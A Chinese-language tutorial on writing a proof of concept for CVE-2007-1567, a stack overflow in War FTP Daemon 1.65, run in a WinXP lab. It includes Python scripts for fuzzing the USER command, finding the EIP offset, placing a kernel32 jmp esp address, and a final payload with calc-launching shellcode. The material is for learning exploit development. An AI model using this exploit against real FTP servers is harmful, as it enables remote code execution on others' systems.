从CVE-2007-1567分析学习构造poc

漏洞概况

漏洞编号: CVE-2007-1567
漏洞类型: 远程任意代码执行
漏洞成因： 堆栈缓冲区溢出
漏洞软件： War FTP Daemon (1.65及之前版本）
资源连接： https://www.exploit-db.com/exploits/3570

分析环境

系统： WinXP pro （必须在xp系统 win7报错）
工具： windbg、 Immunity Debugger、 mona插件

分析思路

 1·根据ftp协议构建测试poc 测试溢出 崩溃等异常是否存在
 2·windbg+mona 生成有序字符串 计算溢出点位置 并测试
 3·Immnuity Debugger+mona查找跳板指令地址 如jmp esp，retn等 填充测试能否实现准确跳转
 4·构建或寻找测试shellcode ，完善poc
 5·Exp尝试思路，shellcode构建中使用自定义钩子的思路（但没想明白当前堆栈环境如何保存)

测试是否存在溢出

#!usr/bin/python
import socket

tsock =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tsock.connect(("192.168.136.140",21))
response=tsock.recv(1024)

payload="USER "#此处须有空格做截断
payload+="A"*1000
payload+="\r\n"#此处须有换行符标识字符串结束

tsock.send(payload)

重运行或重附加报错

删除FtpDoemon.dat文件即可解决报错

定位溢出点偏移

#!usr/bin/python
#coding=utf-8  #SyntaxError: Non-ASCII character '\xe6' in file 错误解决办法
import socket

tsock =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tsock.connect(("192.168.136.140",21))
response=tsock.recv(1024)

payload="USER "#此处须有空格做截断
payload+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
payload+="\r\n"#此处须有换行符标识字符串结束

tsock.send(payload)

确认溢出点位置 测试EIP填充

#!usr/bin/python
#coding=utf-8  #SyntaxError: Non-ASCII character '\xe6' in file 错误解决办法
import socket

tsock =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tsock.connect(("192.168.136.140",21))
response=tsock.recv(1024)

payload="USER "#此处须有空格做截断
payload+="A"*485+"B"*4+"C"*100
payload+="\r\n"#此处须有换行符标识字符串结束

tsock.send(payload)

查找JMP ESP 跳板指令地址

Log data, item 23
Address=7C86467B
Message= 0x7c86467b : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)

内存的地址：7C86467B。记为小端存储的"\x7B\x46\x86\x7C",代替脚本中的"B"*4实现EIP截获。

#!usr/bin/python
#coding=utf-8  #SyntaxError: Non-ASCII character '\xe6' in file 错误解决办法
import socket

tsock =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tsock.connect(("192.168.136.140",21))
response=tsock.recv(1024)

payload="USER "#此处须有空格做截断
payload+="A"*485+"\x7B\x46\x86\x7C"+"\x90"*10
payload+="\r\n"#此处须有换行符标识字符串结束

tsock.send(payload)

制作完整POC

#!usr/bin/python
#coding=utf-8  #SyntaxError: Non-ASCII character '\xe6' in file 错误解决办法
import socket

tsock =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tsock.connect(("192.168.136.140",21))
response=tsock.recv(1024)

payload  =  "USER "#此处须有空格做截断
payload += "A"*485+"\x7B\x46\x86\x7C"+"\x90"*10
payload += "\xeB\x02\xBA\xC7\x93\xBF\x77\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x61\x6C\x63"
payload += "\r\n"#此处须有换行符标识字符串结束

tsock.send(payload)

经验总结

   心态要好，要相信自己可以搞出来的（虽然这个比较简单）。
   不懂先搜后问，在不同地方点到为止的请教

参考链接

https://bbs.pediy.com/thread-226970-1.htm
感谢FFFE4师傅的指导